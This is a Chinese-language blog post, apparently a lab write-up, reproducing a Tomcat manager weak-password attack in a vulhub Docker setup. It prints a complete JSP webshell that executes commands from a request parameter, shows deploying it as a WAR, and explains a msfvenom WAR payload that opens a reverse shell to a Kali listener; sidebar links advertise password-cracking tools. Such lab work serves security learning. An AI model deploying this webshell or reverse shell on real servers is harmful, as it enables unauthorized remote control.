Tomcat弱口令漏洞

最新推荐文章于 2024-05-11 11:09:50 发布
最新推荐文章于 2024-05-11 11:09:50 发布
阅读量1.8k 收藏 6
点赞数 2
分类专栏: 中间件漏洞 文章标签: tomcat 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43665434/article/details/116903953
版权

Tomcat弱口令漏洞


漏洞原理:传送门

实验环境

主机角色IP
centos8漏洞靶机192.168.1.80
kalimsf生成木马,接收shell192.168.1.128
windows10攻击机192.168.1.120

实验流程

开启漏洞靶机centos8

# 开启docker服务
service docker start
# 切换到vulhub目录
cd /usr/sbin/vulhub/tomcat/tomcat8
# 创建镜像
docker-compose build
# 开启镜像
docker-compose up -d

尝试访问漏洞页面:

image-20210516193255115

如图所示,访问成功!

进入镜像配置文件查看初始密码:

# 进入镜像
docker exec -it 镜像id /bin/bash
# 切换到配置目录
cd /usr/local/tomcat/conf
# 查看配置文件
cat tomcat-users.xml

image-20210516193622522

如图所示,可以看出tomcat管理页面的用户名和密码都是tomcat,存在明显的弱口令漏洞。

输入用户名和密码,成功登录到tomcat管理页面:

image-20210516193327450

第一种方式上传webshell

准备一个木马文件shell.jsp

内容如下:

<%@
page language="java"
import="java.util.*,java.io.*"
pageEncoding = "UTF-8"
%>
<%!public static String excuteCmd(String c) {
	StringBuilder line = new StringBuilder();
	try {
		Process pro = Runtime.getRuntime().exec(c);
		BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
		String temp = null;
		while ((temp = buf.readLine()) != null){
			line.append(temp+"\\n");
		}
		buf.close();
	} catch (Exception e) {
		line.append(e.getMessage());
	}
	return line.toString();
}
%>
<%
if(!"".equals(request.getParameter("cmd"))){
	out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");
}else{
	out.println(":-)");
}
%>

在windows10的dos界面下,将shell.jsp打包为shell.war,用于javaweb包的热部署

打包命令为jar cvf shell.war shell.jsp

image-20210516195051701

如下图所示,成功打包为shell.war:

image-20210516195152558

将shell.war包上传到javaweb应用中:

image-20210516195342023

如下图所示,上传并部署成功:

image-20210516195430303

尝试访问木马文件,并传入命令参数:

image-20210516195652287

如图所示,成功回显命令执行结果。


第二种方式msf反弹shell

在kali主机,利用msfvenom工具生成war文件木马:

LHOST=kali的IP

LPORT=kali的端口(任意)

image-20210516200320992

如图所示,生成完毕。

将生成的木马文件下载下来到window主机:

image-20210516200348508

如图所示,下载完毕:

image-20210516200634337

将qianxun.war更改为qianxun.rar,并用压缩工具winrar打开:

image-20210516200652417

image-20210516200725625

如上图所示,在qianxun.war包中还有木马文件vzajtnpod.jsp,记下文件名后,将qianxun.rar重新改回为qianxun.war

将木马文件qianxun.war上传到javaweb应用中:

image-20210516200505574

在kali主机上开启msfconsole监听:

image-20210516201245931

在浏览器中访问该木马文件:

image-20210516201408253

再回到kali,发现shell已被成功反弹:

image-20210516201222722

至此,实验完毕。

0ak1ey
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Tomcat弱口令扫描工具
07-18
Tomcat弱口令扫描工具,可自己写字典进行爆破。
Tomcat弱口令专项扫描工具.zip
03-24
Tomcat弱口令扫描工具
Tomcat漏洞(弱口令war包)详解
xinyue9966的博客
02-17 4873
后台弱口令上传war包 影响版本:Tomcat版本:7.0–>8.0 影响说明:后台弱口令登录,上传webshell 环境说明:PHP5.5.38 、 Apache2.4.10、Tomcat 8.0.43 环境搭建 东塔靶场 漏洞原理 tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理tomcat是一个中间件,在B/S架构中,浏览器发出的http请求经过tpmcat中间件,转发到最终的目的服务器上
Tomcat7+ 弱口令 && 后台getshell漏洞
weixin_45653478的博客
05-11 1005
Tomcat 是一个流行的开源Web应用服务器,用于部署和运行Java Web应用程序。Tomcat 7+ 版本中存在一个安全隐患,即默认的管理员密码可能较或者未被修改,攻击者可以利用这一漏洞登录到Tomcat管理后台,并上传恶意的WAR包来执行任意代码。
Tomcat 弱口令 && 后台getshell漏洞
weixin_46601374的博客
04-05 7521
漏洞编号 VUL-2021040008 爆发时间 2018-10-10 漏洞简介 Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 影响版本 Tomcat8.x,Tomcat7.x 漏洞详情 Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 Tomcat7+权限分为: manager(后台管理) 1、manager-gui 拥
漏洞复现 - - -Tomcat弱口令漏洞
weixin_67503304的博客
08-07 7362
通过弱口令的方法爆破tomcat漏洞,通过上传war包拿到shell,简单的弱口令漏洞复现。
漏洞复现(vulhub tomcat弱口令漏洞
qq_53409748的博客
02-16 738
vulhub上的tomcat弱口令漏洞
tomcat工具
07-03
【标题】:“Tomcat工具” 【描述】:“用于Eclipse里的Tomcat的安装” 在Java Web开发中,Tomcat是一个非常流行的开源应用服务器,它主要负责运行Servlet和JSP应用程序。Tomcat是Apache软件基金会的Jakarta项目的...
tomcat漏洞总结.rar
04-21
本文件包含Tomcat近几年爆发的4个严重漏洞,包含从tomcat弱口令上传,到tomcatPUT上传小马,本地权限提升一级反序列化漏洞,其中弱口令包含2本字典以及详细用法,PUT上传包含POC,反序列化和权限提升包含代码及详细...
弱口令字典(ftp/oracle/tomcat/domino)、web目录
04-14
这些给定的文件名表明它们包含了一系列针对不同服务和应用的弱口令字典,包括FTP、Oracle数据库、Tomcat应用服务器、Domino服务器以及Web目录扫描。下面将详细解释这些服务与弱口令关联的知识点。 1. **FTP(File ...
Apache Tomcat Scanner
03-15
Apache Tomcat Scanner是一款专门针对Apache Tomcat服务器的安全工具,它设计用于检测和识别Tomcat服务器可能存在的一些安全漏洞,特别是弱口令问题。Apache Tomcat是一款广泛使用的开源Java Servlet容器,它实现了...
这才是真正D.S.T内部用的(tomcat漏洞)扫描工具
07-01
这才是真正D.S.T内部用的(tomcat漏洞)扫描工具解压缩密码: vip2008
Tomcat 弱口令及文件上传漏洞复现
君莫hacker的博客
09-16 3086
目录0x01 漏洞介绍0x02 环境部署:0x03 漏洞复现 0x01 漏洞介绍 漏洞描述 漏洞编号 受影响版本 0x02 环境部署: 搭建一次,复现百次 靶机 ip:192.168.30.209 kali ip:192.168.30.182 0x03 漏洞复现 从github下载tomcat8的源码,我们可以查看tomcat的默认登录名为tomcat,并且密码也为tomcat 点击Server Status进行登录 弱口令tomcat tomcat 直接登录成功 发现文件上传点
漏洞复现】Tomcat弱口令+后台getshell
m0_52450604的博客
02-07 659
漏洞复现】Tomcat弱口令+后台getshell
Tomcat+弱口令&后台Getshell漏洞复现
weixin_60329395的博客
08-03 1191
漏洞影响范围:Tomcat 8.0版本、漏洞类型:弱口令、任意文件上传、漏洞成因:在tomcat8环境下,默认的后台密码为tomcat:tomcat,未修改默认密码就会造成未经授权的后台访问后台存在war包绕过
Tomcat控制台密码漏洞
Kevin's Blog
07-23 4476
文章目录一、漏洞介绍1.1 漏洞原理1.2 影响版本1.3 触发条件二、环境搭建2.1 环境信息2.2 tomcat配置2.3 配置漏洞环境三、攻击过程四、漏洞修复 一、漏洞介绍 1.1 漏洞原理   Tomcat支持后台部署War文件,默认情况下管理页面仅允许本地访问,如果网站运维/开发人员手动修改配置文件中的信息允许远程IP进行访问(需求),且恶意攻击者拿到管理界面账户密码情况下,则可上传木马文件,控制系统。 1.2 影响版本 全版本 1.3 触发条件 默认配置文件已被修改,允许非本地访问 攻击者
Tomcat任意文件上传CVE-2017-12615漏洞JSP利用脚本
zhlhely的博客
09-27 581
#! -*- coding:utf-8 -*- import requests import sys body = ''' <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%> <%!public static String excuteCmd(String c) { StringBuilder line = new StringBuilder(); try...
【墨者学院】Tomcat后台弱口令漏洞利用
weixin_43884770的博客
12-06 1339
背景介绍 “墨者”安全工程师发现某个基于Tomcat的Web服务器后台存在漏洞,你也一起来学习吧。 实训目标 1、了解Tomcat服务器的基本操作; 2、了解Tomcat服务器War包部署功能; 解题方向 网站常用后台密码登录,部署war包。 解题思路: 随便点击一个地方会跳出登录页面,发现提示输入用户名密码,题目提示存在弱口令,于是网上查找了tomcat默认的用户名密码,发现都不对,最后自己...
tomcat管理界面弱口令扫描
08-30 4358
关于tomcat弱口令扫描问题,应当注意两点。第一是版本问题。 在tomcat6及6之前,是可以直接暴力破解的。 抓一下tomcat登陆管理界面的数据包,可以看出,其认证方式是在http的请求header中添加一个字段为 Authorization,这个字段的值是 “Basic base64(username:password)”,因此在暴力破解时,只需要在请求包中添加该字段即可。 在tom...
tomcat弱口令登入后台漏洞复现
最新发布
07-13
1. **查找漏洞信息**:首先确认该Tomcat版本是否存在已知的弱口令漏洞,这通常可以在安全公告、官方文档或漏洞数据库(如CVE)中找到。 2. **目标环境设置**:确定你的目标Tomcat服务器的IP地址、端口号以及默认...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值